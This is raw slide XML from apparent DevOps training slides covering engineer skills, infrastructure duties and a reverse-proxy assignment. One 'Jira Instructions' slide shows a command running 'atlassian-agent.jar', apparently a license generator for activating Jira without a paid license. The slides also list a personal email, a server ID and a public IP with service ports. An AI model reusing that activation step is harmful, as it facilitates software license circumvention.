          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="38761D"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Strong </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>problem-solving skills</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="38761D"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ability to work on multiple projects at the same time</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="38761D"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Awareness of DevOps and Agile principles and the ability to apply them.</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>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378"/>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lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="3400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1700"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2700">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DevOps engineers Setup all Infrastructure of a company</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3800">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2316" name="Google Shape;2316;p378"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1730975" y="1214400"/>
            <a:ext cx="5794200" cy="35385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2100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="38761D"/>
              </a:buClr>
              <a:buSzPts val="2200"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Setup/Provisioning the Servers (EC2-&gt;AWS)</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-368300" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="38761D"/>
              </a:buClr>
              <a:buSzPts val="2200"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Atlassian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Jira</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-368300" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="38761D"/>
              </a:buClr>
              <a:buSzPts val="2200"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Atlassian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Confluence</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-368300" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="38761D"/>
              </a:buClr>
              <a:buSzPts val="2200"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Github/Bitbucket/GitLabs</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-368300" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="38761D"/>
              </a:buClr>
              <a:buSzPts val="2200"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Manage Database and Server</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-368300" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="38761D"/>
              </a:buClr>
              <a:buSzPts val="2200"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DevOps Eng. are SQL Master</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>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0" name="Shape 2320"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2321" name="Google Shape;2321;p37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lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="3400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1700"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2477">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DevOps engineers Setup all Infrastructure of a company</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3577">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2322" name="Google Shape;2322;p379"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1845600" y="1244850"/>
            <a:ext cx="5452800" cy="2653800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-406400" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="38761D"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Setup SSL </a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-406400" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="38761D"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Reverse Proxies</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-406400" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="38761D"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Web Servers (Apache2/Nginx)</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-406400" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="38761D"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SMTP Email Servers</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>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38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220">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Jira Instructions</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3220">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2328" name="Google Shape;2328;p3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2300">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Syntax</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2300">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>java -jar atlassian-agent.jar -m &lt;your email&gt; -o &lt;your organization&gt; -p &lt;product to activate&gt; -s &lt;Server ID&gt; &amp; Enter</a:t>
            </a:r>
            <a:endParaRPr sz="2300">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2300">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Example j</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2300">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>java -jar atlassian-agent.jar -m anildalar8888@gmail.com -o OKLABS -p jira -s BN3Z-Z9OH-ONEX-8YMH</a:t>
            </a:r>
            <a:endParaRPr sz="2300">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2300">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>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381"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="9022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SSL and Reverse Proxy </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3620">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Assignments</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3620">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2334" name="Google Shape;2334;p381"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="310650" y="1742000"/>
            <a:ext cx="8563800" cy="25185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SzPts val="275"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1660" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://next.dollorinfotech.com</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1660">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> -&gt; 38.242.236.173:10000   NextJs</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1660">
              <a:solidFill>
                <a:srgbClr val="38761D"/>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b="1" lang="en" sz="1660" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
                <a:hlinkClick r:id="rId4">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://react.dollorinfotech.com</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1660">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1660">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>38.242.236.173:20000  ReactJs</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1660">
              <a:solidFill>
                <a:srgbClr val="38761D"/>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b="1" lang="en" sz="1660" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
                <a:hlinkClick r:id="rId5">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://vue.dollorinfotech.com</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1660">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1660">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>38.242.236.173:65000    VueJs</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1660">
              <a:solidFill>
                <a:srgbClr val="38761D"/>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b="1" lang="en" sz="1660" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
                <a:hlinkClick r:id="rId6">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://jenkins.dollorinfotech.com</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1660">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1660">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>38.242.236.173:8080 Jenkins</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1660">
              <a:solidFill>
                <a:srgbClr val="38761D"/>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b="1" lang="en" sz="1660" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
                <a:hlinkClick r:id="rId7">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://jira.dollorinfotech.com</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1660">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1660">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>38.242.236.173:9090    Jira</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1660">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buSzPts val="275"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="200">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>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8" name="Shape 2338"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2339" name="Google Shape;2339;p38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Reverse Proxy</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3620">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2340" name="Google Shape;2340;p382"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="82050" y="1284800"/>
            <a:ext cx="8979900" cy="32226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275"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="4060">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Reverse Proxy can be used when you have multiple applications running on the same server on different ports</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>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38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Live Server Credentials</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4020">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2346" name="Google Shape;2346;p383"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1381075"/>
            <a:ext cx="7619100" cy="35745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Clr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
